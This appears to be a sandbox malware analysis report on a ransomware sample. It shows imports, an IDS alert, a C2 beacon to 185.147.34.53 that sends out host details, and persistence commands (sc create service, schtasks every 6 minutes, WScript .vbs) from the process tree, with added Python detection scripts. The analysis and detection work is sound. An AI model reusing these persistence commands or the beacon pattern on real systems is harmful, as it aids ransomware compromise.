                                    jnbe 00007F18B9265D3Ah
                                    jc 00007F18B9265D41h
                                    cmp eax, dword ptr [esp+08h]
                                    jbe 00007F18B9265D3Bh
                                    dec esi
                                    sub eax, dword ptr [esp+10h]
                                    sbb edx, dword ptr [esp+14h]
                                    xor ebx, ebx
                                    sub eax, dword ptr [esp+08h]
                                    sbb edx, dword ptr [esp+0Ch]
                                    neg edx
                                    neg eax
                                    sbb edx, 00000000h
                                    mov ecx, edx
                                    mov edx, ebx
                                    mov ebx, ecx
                                    mov ecx, eax
                                    mov eax, esi
                                    pop esi
                                    retn 0010h
                                    int3
                                    int3
                                    int3
                                    Programming Language:
                                    • [IMP] VS2008 SP1 build 30729
                                     Name | Virtual Address | Virtual Size | Is in Section
                                     IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_IMPORT | 0x11dac4 | 0xb4 | .rdata
                                     IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x130000 | 0x1e0 | .rsrc
                                     IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x131000 | 0xd6d8 | .reloc
                                     IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1056c0 | 0x38 | .rdata
                                     IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_TLS | 0x10579c | 0x18 | .rdata
                                     IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1056f8 | 0x40 | .rdata
                                     IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_IAT | 0xe3000 | 0x328 | .rdata
                                     IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                     Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                     .text | 0x1000 | 0xe1dd6 | 0xe1e00 | cd9d64b742fb4b7fe56ff7d10a8165cd | False | 0.459598306931378 | data | 6.6440565404145735 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                     .rdata | 0xe3000 | 0x3bd08 | 0x3be00 | 6e18c61b78256b13c16a8bec1d98d4ea | False | 0.3939848643006263 | data | 5.012794360955865 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                     .data | 0x11f000 | 0x10778 | 0x8200 | ce22c5eef0d11dddf7c37e1a946c9b5c | False | 0.1565204326923077 | data | 4.831725870753727 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                     .rsrc | 0x130000 | 0x1e0 | 0x200 | 319e7ac1640c4d053129c81ac0038351 | False | 0.52734375 | data | 4.701503258251789 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                     .reloc | 0x131000 | 0xd6d8 | 0xd800 | 655312fd133ef279042aa4f35584fb34 | False | 0.5692455150462963 | data | 6.57307515906302 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                     Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                     RT_MANIFEST | 0x130060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
                                     DLL | Import
                                     KERNEL32.dll | Sleep, FormatMessageW, GetLastError, SetEvent, GetDiskFreeSpaceExW, GetCurrentThread, WaitForSingleObjectEx, CloseHandle, HeapAlloc, GetLogicalDriveStringsA, GetProcAddress, SetFilePointerEx, LocalFree, GetFileSize, GetProcessHeap, GlobalMemoryStatusEx, MultiByteToWideChar, CopyFileW, WideCharToMultiByte, GetConsoleWindow, FormatMessageA, CreateSemaphoreA, CreateEventA, lstrcmpW, SetConsoleTitleW, SetLastError, QueryPerformanceCounter, QueryPerformanceFrequency, GetThreadTimes, WriteConsoleW, SetStdHandle, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetComputerNameExW, GetSystemDirectoryW, GetFileAttributesW, CreateFileW, LocalAlloc, FindClose, WaitForMultipleObjectsEx, SetFilePointer, SetErrorMode, GetModuleFileNameW, WriteFile, ReleaseSemaphore, GetCurrentProcess, FindNextFileW, HeapFree, FindFirstFileW, ReadFile, GetModuleHandleW, CreateDirectoryW, GetEnvironmentStringsW, GetOEMCP, IsValidCodePage, FindNextFileA, FindFirstFileExA, GetTimeZoneInformation, HeapSize, HeapReAlloc, ReadConsoleW, CreatePipe, GetExitCodeProcess, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, GetACP, GetCommandLineW, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, EncodePointer, DecodePointer, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, DeleteFileW, GetFileAttributesExW, SetEndOfFile, DeviceIoControl, MoveFileExW, AreFileApisANSI, ResetEvent, OpenEventA, SetWaitableTimer, GetCurrentProcessId, ResumeThread, GetLogicalProcessorInformation, GetModuleHandleA, CreateWaitableTimerA, InitializeSListHead, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsDebuggerPresent, GetStartupInfoW, SignalObjectAndWait, CreateThread, SetThreadPriority, GetThreadPriority, CreateTimerQueueTimer, ChangeTimerQueueTimer, DeleteTimerQueueTimer, GetNumaHighestNodeNumber, GetProcessAffinityMask, SetThreadAffinityMask, RegisterWaitForSingleObject, UnregisterWait, FreeLibrary, FreeLibraryAndExitThread, LoadLibraryExW, GetVersionExW, VirtualAlloc, VirtualProtect, VirtualFree, DuplicateHandle, InterlockedPopEntrySList, InterlockedPushEntrySList, InterlockedFlushSList, QueryDepthSList, UnregisterWaitEx, CreateTimerQueue, LoadLibraryW, WaitForSingleObject, RtlUnwind, RaiseException, ExitProcess, GetModuleHandleExW, CreateProcessA, ExitThread, GetModuleFileNameA, GetStdHandle, GetCommandLineA
                                     USER32.dll | EnumWindows, GetWindowTextA, ShowWindow, GetWindowTextLengthA
                                     ADVAPI32.dll | CryptGenRandom, CryptReleaseContext, CryptAcquireContextA, SetSecurityDescriptorDacl, AccessCheck, SetSecurityDescriptorOwner, AllocateAndInitializeSid, IsValidSecurityDescriptor, OpenProcessToken, FreeSid, InitializeSecurityDescriptor, InitializeAcl, DuplicateToken, GetLengthSid, GetUserNameW, AddAccessAllowedAce, OpenThreadToken, SetSecurityDescriptorGroup
                                     SHELL32.dll | ShellExecuteW
                                     WS2_32.dll | htons, recv, connect, socket, send, WSAStartup, closesocket, WSACleanup, gethostbyname
                                     SHLWAPI.dll | PathIsNetworkPathA
                                     NETAPI32.dll | NetUserEnum, DsRoleGetPrimaryDomainInformation, NetApiBufferFree
                                     WININET.dll | HttpOpenRequestW, HttpSendRequestW, InternetOpenW, InternetReadFile, InternetConnectW
                                     Language of compilation system | Country where language is spoken
                                     English | United States
Suricata IDS alert
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-06T13:39:10.708832+0100 | 2045821 | ET MALWARE [ANY.RUN] RCRU64 Ransomware Variant CnC Activity | 1 | 192.168.2.6 | 49742 | 185.147.34.53 | 3586 | TCP

TCP packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 6, 2024 13:39:24.301135063 CET | 49736 | 80 | 192.168.2.6 | 104.26.12.205
Dec 6, 2024 13:39:24.421325922 CET | 80 | 49736 | 104.26.12.205 | 192.168.2.6
Dec 6, 2024 13:39:24.421413898 CET | 49736 | 80 | 192.168.2.6 | 104.26.12.205
Dec 6, 2024 13:39:24.421777010 CET | 49736 | 80 | 192.168.2.6 | 104.26.12.205
Dec 6, 2024 13:39:24.541579962 CET | 80 | 49736 | 104.26.12.205 | 192.168.2.6
Dec 6, 2024 13:39:25.525494099 CET | 80 | 49736 | 104.26.12.205 | 192.168.2.6
Dec 6, 2024 13:39:25.525551081 CET | 49736 | 80 | 192.168.2.6 | 104.26.12.205
Dec 6, 2024 13:39:25.568466902 CET | 49742 | 3586 | 192.168.2.6 | 185.147.34.53
Dec 6, 2024 13:39:25.688294888 CET | 3586 | 49742 | 185.147.34.53 | 192.168.2.6
Dec 6, 2024 13:39:25.688361883 CET | 49742 | 3586 | 192.168.2.6 | 185.147.34.53
Dec 6, 2024 13:39:25.688416004 CET | 49742 | 3586 | 192.168.2.6 | 185.147.34.53
Dec 6, 2024 13:39:25.808204889 CET | 3586 | 49742 | 185.147.34.53 | 192.168.2.6
Dec 6, 2024 13:39:25.808221102 CET | 3586 | 49742 | 185.147.34.53 | 192.168.2.6

UDP packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 6, 2024 13:39:24.156151056 CET | 61778 | 53 | 192.168.2.6 | 1.1.1.1
Dec 6, 2024 13:39:24.294003963 CET | 53 | 61778 | 1.1.1.1 | 192.168.2.6

DNS queries
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 6, 2024 13:39:24.156151056 CET | 192.168.2.6 | 1.1.1.1 | 0xafae | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false

DNS answers
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 6, 2024 13:39:12.879983902 CET | 1.1.1.1 | 192.168.2.6 | 0x3cc2 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 6, 2024 13:39:12.879983902 CET | 1.1.1.1 | 192.168.2.6 | 0x3cc2 | No error (0) | s-part-0035.t-0009.t-msedge.net | - | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 13:39:24.294003963 CET | 1.1.1.1 | 192.168.2.6 | 0xafae | No error (0) | api.ipify.org | - | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 13:39:24.294003963 CET | 1.1.1.1 | 192.168.2.6 | 0xafae | No error (0) | api.ipify.org | - | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 13:39:24.294003963 CET | 1.1.1.1 | 192.168.2.6 | 0xafae | No error (0) | api.ipify.org | - | 104.26.13.205 | A (IP address) | IN (0x0001) | false
                                    • api.ipify.org
                                    • 185.147.34.53
HTTP session 0
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49736 | 104.26.12.205 | 80 | 7152 | C:\Users\user\Desktop\8AbMCL2dxM.exe
Dec 6, 2024 13:39:24.421777010 CET | 82 bytes | OUT
GET / HTTP/1.1
                                    Accept: text/*
                                    User-Agent: YourUserAgent
                                    Host: api.ipify.org
Dec 6, 2024 13:39:25.525494099 CET | 429 bytes | IN
HTTP/1.1 200 OK
                                    Date: Fri, 06 Dec 2024 12:39:25 GMT
                                    Content-Type: text/plain
                                    Content-Length: 12
                                    Connection: keep-alive
                                    Vary: Origin
                                    CF-Cache-Status: DYNAMIC
                                    Server: cloudflare
                                    CF-RAY: 8edc56af7e2c80cd-EWR
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1562&rtt_var=781&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=82&delivery_rate=0&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                    Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38
                                    Data Ascii: 8.46.123.228


HTTP session 1
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49742 | 185.147.34.53 | 3586 | 7152 | C:\Users\user\Desktop\8AbMCL2dxM.exe
Dec 6, 2024 13:39:25.688416004 CET | 2121 bytes | OUT
GET /110_And_Netword_Drive_Size:0_Encryption_Mode:_Fast_Mode!Empty]_____03/10/2023,_10:57:18$_06/12/2024-_7:39:[Version_10.0.19045.2006|Microsoft_Windows_10_Prohg3l,8.46.123.228~ [TRUNCATED]
                                    Host: 185.147.34.53
                                    Connection: close
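
The two HTTP sessions above form one pattern: the sample first asks api.ipify.org for its public IP, then sends that IP, together with encryption mode and OS version, in the URI of a GET to 185.147.34.53 on port 3586. The script below is an added example (not part of the Joe Sandbox report and not the sample's own code) that correlates the two: it takes the IP returned by the echo service and flags any later request to another host that carries it, then pulls the labelled fields out of the beacon URI. The session records are constructed from the report's sessions 0 and 1, with the C2 URI reproduced only as far as the report shows it; the indicator names are this example's own.

```python
"""Added example: correlate the api.ipify.org lookup in session 0 with the
later request to 185.147.34.53:3586 in session 1. Session data below is
constructed from the two HTTP sessions in this report, not a live capture."""
import re
from dataclasses import dataclass


@dataclass
class HttpSession:
    session_id: int
    dst_ip: str
    dst_port: int
    host: str           # value of the Host header
    request_line: str   # e.g. "GET / HTTP/1.1"
    response_body: str  # decoded body, "" when none was captured


# Constructed from the report's sessions 0 and 1 (C2 URI truncated as in the report).
SESSIONS = [
    HttpSession(0, "104.26.12.205", 80, "api.ipify.org",
                "GET / HTTP/1.1", "8.46.123.228"),
    HttpSession(1, "185.147.34.53", 3586, "185.147.34.53",
                "GET /110_And_Netword_Drive_Size:0_Encryption_Mode:_Fast_Mode!Empty]"
                "_____03/10/2023,_10:57:18$_06/12/2024-_7:39:"
                "[Version_10.0.19045.2006|Microsoft_Windows_10_Prohg3l,8.46.123.228~"
                " HTTP/1.1", ""),
]

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
IP_ECHO_HOSTS = {"api.ipify.org"}       # public-IP echo services seen in the report
STANDARD_HTTP_PORTS = {80, 443, 8080}


def learned_public_ips(sessions):
    """Public IPs handed back to the sample by an IP-echo service."""
    ips = set()
    for s in sessions:
        if s.host in IP_ECHO_HOSTS:
            ips.update(IPV4.findall(s.response_body))
    return ips


def request_uri(session):
    parts = session.request_line.split(" ")
    return parts[1] if len(parts) >= 2 else ""


def find_beacons(sessions):
    """Requests to other hosts whose URI carries an IP learned from the echo service.
    Returns a list of (session_id, "ip:port", leaked_ip, [indicators])."""
    ips = learned_public_ips(sessions)
    hits = []
    for s in sessions:
        if s.host in IP_ECHO_HOSTS:
            continue
        uri = request_uri(s)
        leaked = sorted(ip for ip in ips if ip in uri)
        if not leaked:
            continue
        indicators = ["public_ip_in_uri"]
        if s.dst_port not in STANDARD_HTTP_PORTS:
            indicators.append(f"non_standard_port:{s.dst_port}")
        if IPV4.fullmatch(s.host):
            indicators.append("host_header_is_ip")
        if "Encryption_Mode" in uri:
            indicators.append("ransomware_mode_string")
        hits.append((s.session_id, f"{s.dst_ip}:{s.dst_port}", leaked[0], indicators))
    return hits


def parse_beacon_fields(uri):
    """Pull the labelled fields out of the beacon URI; the labels are the sample's own."""
    fields = {}
    m = re.search(r"Drive_Size:(\d+)", uri)
    if m:
        fields["drive_size"] = m.group(1)
    m = re.search(r"Encryption_Mode:_(\w+?)_Mode", uri)
    if m:
        fields["encryption_mode"] = m.group(1)
    m = re.search(r"\[Version_([\d.]+)\|", uri)
    if m:
        fields["os_version"] = m.group(1)
    return fields


if __name__ == "__main__":
    for hit in find_beacons(SESSIONS):
        print(hit)
    print(parse_beacon_fields(request_uri(SESSIONS[1])))
```

Correlating on the echoed IP rather than on the C2 address is the point: the IP echo lookup is common to many families and is benign on its own, but the same string reappearing in a request to a different host on a non-HTTP port is specific enough to alert on without a per-sample signature.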


                                    Target ID:1
                                    Start time:07:39:16
                                    Start date:06/12/2024
                                    Path:C:\Users\user\Desktop\8AbMCL2dxM.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\8AbMCL2dxM.exe"
                                    Imagebase:0x8b0000
                                    File size:1'260'544 bytes
                                    MD5 hash:F383DB0B947E0BCE25A542DD7FC11139
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:false

                                    Target ID:2
                                    Start time:07:39:16
                                    Start date:06/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:3
                                    Start time:07:39:16
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:4
                                    Start time:07:39:16
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist /v /fo csv
                                    Imagebase:0x290000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:07:39:16
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\findstr.exe
                                    Wow64 process (32bit):true
                                    Commandline:findstr /i "dcdcf"
                                    Imagebase:0x640000
                                    File size:29'696 bytes
                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:07:39:19
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:07:39:19
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\sc.exe
                                    Wow64 process (32bit):true
                                    Commandline:sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
                                    Imagebase:0xfa0000
                                    File size:61'440 bytes
                                    MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:8
                                    Start time:07:39:19
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:9
                                    Start time:07:39:19
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\sc.exe
                                    Wow64 process (32bit):true
                                    Commandline:sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
                                    Imagebase:0xfa0000
                                    File size:61'440 bytes
                                    MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:10
                                    Start time:07:39:19
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:11
                                    Start time:07:39:19
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\sc.exe
                                    Wow64 process (32bit):true
                                    Commandline:sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
                                    Imagebase:0xfa0000
                                    File size:61'440 bytes
                                    MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:12
                                    Start time:07:39:19
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c ver
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:13
                                    Start time:07:39:19
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:14
                                    Start time:07:39:19
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\wscript.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
                                    Imagebase:0xcd0000
                                    File size:147'456 bytes
                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:15
                                    Start time:07:39:19
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:16
                                    Start time:07:39:19
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f
                                    Imagebase:0xba0000
                                    File size:187'904 bytes
                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true
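
The process tree up to this point shows the sample's persistence and self-check commands: a `tasklist | findstr` check for its own marker, three `sc create SqlBakup` attempts pointing a service at an executable in the user's Startup folder, a `.vbs` launched from AppData via WScript, and a scheduled task that runs an AppData batch file every 6 minutes. The script below is an added example (not part of the Joe Sandbox report) of rules a detection engineer would run over process-creation events to catch each of these. The events are constructed from the report's command lines (Target IDs 3, 7, 11, 14 and 16) plus two benign controls; the rule names and directory markers are this example's own assumptions.

```python
"""Added example: flag the persistence and self-check commands in this report's
process tree from process-creation events. EVENTS is constructed from the
report's command lines plus two benign controls; it is not a live log."""
import re

# (pid, image path, command line) -- constructed from the report, not captured
EVENTS = [
    (3, r"C:\Windows\SysWOW64\cmd.exe",
     r'C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"'),
    (7, r"C:\Windows\SysWOW64\sc.exe",
     r'sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto'),
    (11, r"C:\Windows\SysWOW64\sc.exe",
     r'sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto'),
    (14, r"C:\Windows\SysWOW64\wscript.exe",
     r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"'),
    (16, r"C:\Windows\SysWOW64\schtasks.exe",
     r'''schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f'''),
    # benign controls (constructed)
    (40, r"C:\Windows\System32\sc.exe", r"sc query wuauserv"),
    (41, r"C:\Windows\System32\schtasks.exe",
     r'schtasks /create /sc daily /tn "Backup" /tr "C:\Program Files\Backup\run.exe"'),
]

# directory markers assumed to be writable by a standard user
USER_WRITABLE = ("\\appdata\\", "\\documents and settings\\", "\\users\\public\\", "\\temp\\")
STARTUP_DIR = "\\start menu\\programs\\startup\\"
SERVICE_CREATE = re.compile(r'\bsc(?:\.exe)?\s+create\s+(\S+).*?binPath=\s*"([^"]+)"', re.I)
TASK_ACTION = re.compile(r"/tr\s+\"'?([^\"']+)'?\"", re.I)   # handles /tr "'path'" and /tr "path"
SCRIPT_ARG = re.compile(r'"?([A-Za-z]:\\[^"]+?\.(?:vbs|vbe|js|jse|wsf))"?', re.I)


def in_user_writable(path):
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE)


def check_service_create(cmd):
    m = SERVICE_CREATE.search(cmd)
    if not m:
        return []
    binpath = m.group(2)
    rules = []
    if in_user_writable(binpath):
        rules.append("service_binary_in_user_writable_dir")
    if STARTUP_DIR in binpath.lower():
        rules.append("service_binary_in_startup_folder")
    if re.search(r"start=\s*auto\b", cmd, re.I):
        rules.append("service_autostart")
    return rules


def check_schtasks(cmd):
    if not re.search(r"\bschtasks(?:\.exe)?\s+/create\b", cmd, re.I):
        return []
    rules = []
    sc = re.search(r"/sc\s+(\w+)", cmd, re.I)
    mo = re.search(r"/mo\s+(\d+)", cmd, re.I)
    if sc and sc.group(1).lower() == "minute":
        rules.append("task_runs_every_%s_min" % (mo.group(1) if mo else "1"))
    tr = TASK_ACTION.search(cmd)
    if tr:
        action = tr.group(1)
        if in_user_writable(action):
            rules.append("task_action_in_user_writable_dir")
        if re.search(r"\.(bat|cmd|vbs|js|ps1)$", action, re.I):
            rules.append("task_action_is_script")
    return rules


def check_script_host(image, cmd):
    if not re.search(r"\\[wc]script\.exe$", image, re.I):
        return []
    m = SCRIPT_ARG.search(cmd)
    if m and in_user_writable(m.group(1)):
        return ["script_host_running_script_from_user_writable_dir"]
    return []


def check_process_self_check(cmd):
    # tasklist output piped into a string match: the sample looks for its marker "dcdcf"
    if re.search(r"\btasklist\b.*\|\s*(findstr|find)\b", cmd, re.I):
        return ["process_list_piped_to_string_match"]
    return []


def triage(events):
    """Return one finding per event that trips at least one rule, in event order."""
    findings = []
    for pid, image, cmd in events:
        rules = (check_service_create(cmd) + check_schtasks(cmd)
                 + check_script_host(image, cmd) + check_process_self_check(cmd))
        if rules:
            findings.append({"pid": pid, "image": image, "rules": rules})
    return findings


if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f["pid"], f["image"], ", ".join(f["rules"]))
```

The service rule keys on where `binPath=` points rather than on the service name, since `SqlBakup` is trivially changed while a service binary under a user profile or the Startup folder is abnormal regardless of name. The task rule accepts both `/tr "'path'"` and `/tr "path"`, because the report shows the path wrapped in single quotes inside the double quotes and a regex that expects only one form misses it.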

                                    Target ID:17
                                    Start time:07:39:19
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
